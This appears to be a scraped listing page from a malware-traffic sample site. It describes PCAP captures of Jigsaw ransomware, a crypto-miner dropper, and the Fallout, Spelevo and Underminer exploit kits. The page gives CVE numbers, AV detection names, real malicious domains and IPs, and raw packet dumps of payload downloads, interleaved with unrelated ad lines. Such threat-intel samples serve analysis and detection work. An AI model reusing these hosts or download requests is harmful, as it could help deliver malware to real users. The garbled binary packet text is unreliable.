Jigsaw Ransomware Malware Crimeware PCAP File Download Traffic Sample

Avast FileRepMetagen [Malware] AVG FileRepMetagen [Malware] Avira (no cloud) Malwarebytes Ransom.Jigsaw McAfee-GW-Edition BehavesLike.Win32.Ransomware.dc Microsoft Trojan:Win32/Occamy.C When executed this ransomware has NO C2 it uses an e-mail address with directions as pictured below: 2020-05-01 16:19:09.841147 IP 192.168.86.1.53 > 192.168.86.25.59527: 12228 1/0/0 A 41.97.11.131 (59)E..W..@.@.if..V…V..5…C.p/…………service-updater.hopto.org…………..;..)a..2020-05-01 16:19:09.841596 IP 192.168.86.25.50977 > 41.97.11.131.80: Flags [S], seq 1891890631, win 8192, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0E..4f^@…H…V.)a…!.Pp……… ..s…………..2020-05-01 16:19:10.021362 IP 41.97.11.131.80 > 192.168.86.25.50977: Flags [S.], seq 2051894246, ack 1891890632, win 8192, options [mss 1340,nop,wscale 8,nop,nop,sackOK], length 0E..4Q.@.*..p)a….V..P.!zMk.p….. ……..<…….. 2020-05-01 16:19:10.021569 IP 192.168.86.25.50977 > 41.97.11.131.80: Flags [.], ack 1, win 16415, length 0E..(f_@…H…V.)a…!.Pp…zMk.P.@………..2020-05-01 16:19:10.022040 IP 192.168.86.25.50977 > 41.97.11.131.80: […]

iMyFone LockWiper

Malware Dropper tldrbox.top Loads Crypto Currency Miner PCAP Download Traffic Sample

2020-04-13 00:28:49.420813 IP 192.168.86.25.52831 > 93.126.60.109.80: Flags [P.], seq 1:391, ack 1, win 16500, length 390: HTTP: GET /2.exe HTTP/1.1E…]R@….J..V.]~<m._.P+…80..P.@t….GET /2.exe HTTP/1.1Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, /Accept-Language: en-USUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)Accept-Encoding: gzip, deflateHost: tldrbox.topConnection: Keep-Alive 2020-04-13 00:28:49.623505 IP 93.126.60.109.80 > 192.168.86.25.52831: Flags [.], ack 391, win 237, length 0E..(..@.-..A]~ 192.168.86.25.52831: Flags [.], seq 1:1201, ack 391, win 237, length 1200: HTTP: HTTP/1.1 200 OKE…..@.-…]~<m..V..P._80..+…P… T..HTTP/1.1 200 OKServer: nginx/1.16.1Date: Mon, 13 Apr 2020 04:29:15 GMTContent-Type: application/octet-streamContent-Length: 556032Last-Modified: Wed, 08 Apr 2020 02:44:48 GMTConnection: keep-aliveETag: […]

iMyFone LockWiper

Fallout Exploit Kit Raccoon Stealer CVE-2018-4878 CVE-2018-15982 CVE-2018-8174 Raccoon Stealer Malware PCAP Download Traffic Sample

Fallout Exploit Kit is back and targeting the following CVE’s as of 4-8-2020: Vulnerabilities CVE-2018-4878 CVE-2018-15982 CVE-2018-8174 Fallout has been observed in the wild delivering the following malware payloads: Ransomware Stop – Ransomware GandCrab 5 – Ransomware Kraken Cryptor – Ransomware GandCrab – Ransomware Maze – Ransomware Fake Globe – Ransomware Minotaur – Ransomware Matrix – Ransomware Sodinokibi – Ransomware Raccoon Stealer – This sample (also known as Legion, Mohazo, and Racealer) is high-risk trojan-type application that stealthily infiltrates the system and collects personal information. Having this trojan installed on your computer might lead to various issues. 2020-02-24 19:34:02.651895 IP […]

iMyFone LockWiper

Spelevo Exploit Kit EK Serves up Gozi Malware PCAP file download traffic sample

2020-02-19 19:23:32.510874 IP 192.168.4.239.49481 > 3.226.77.126.80: Flags [P.], seq 1:259, ack 1, win 258, length 258: HTTP: GET /go/141657/437555 HTTP/1.1E..*”.@………..M~.I.P….U.$.P….e..GET /go/141657/437555 HTTP/1.1Accept: text/html, application/xhtml+xml, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: ps.popcash.netConnection: Keep-Alive 2020-02-19 19:23:32.511531 IP 192.168.4.239.49482 > 3.226.77.126.80: Flags [.], ack 1, win 258, length 0E..(“.@………..M~.J.P]L.$CG..P………….2020-02-19 19:23:32.754783 IP 3.226.77.126.80 > 192.168.4.239.49481: Flags [.], ack 259, win 237, length 0E..(..@.?.…M~…..P.IU.$…..P….%.. 2020-02-19 19:23:33.299047 IP 3.226.77.126.80 > 192.168.4.239.49481: Flags [P.], seq 1:485, ack 259, win 237, length 484: HTTP: HTTP/1.1 200 OK E…..@.?.(..M~…..P.IU.$…..P…….HTTP/1.1 200 OKDate: Wed, 19 Feb 2020 23:23:32 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveServer: nginxVary: Accept-EncodingContent-Encoding: gzip […]

iMyFone LockWiper

Underminer Exploit Kit EK Delivers Unknown shorico.club Malware Drop PCAP file Download Traffic Analysis

MALICIOUS SUSPICIOUS INFO Changes settings of System certificates rundll32.exe (PID: 2164) Connects to CnC server rundll32.exe (PID: 2164) Loads dropped or rewritten executable regsvr32.exe (PID: 2852) regsvr32.exe (PID: 3052) regsvr32.exe (PID: 1660 2020-02-16 10:55:07.432210 IP 192.168.4.88.49367 > 35.168.149.183.80: Flags [P.], seq 1:259, ack 1, win 258, length 258: HTTP: GET /go/255951/527805 HTTP/1.1E..*..@…k….X#……P..hzS.;tP……GET /go/255951/527805 HTTP/1.1Accept: text/html, application/xhtml+xml, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: ps.popcash.netConnection: Keep-Alive 2020-02-16 10:55:07.432941 IP 192.168.4.88.49368 > 35.168.149.183.80: Flags [.], ack 1, win 258, length 0E..(..@…l….X#……P.SY8..u.P………….2020-02-16 10:55:07.632809 IP 35.168.149.183.80 > 192.168.4.88.49367: Flags [.], ack 259, win 237, length 0E..(..@.?.7.#……X.P..S.;t..i|P…H…2020-02-16 10:55:07.933694 IP 35.168.149.183.80 […]

iMyFone LockWiper




Dashlane 5 - New and Improved!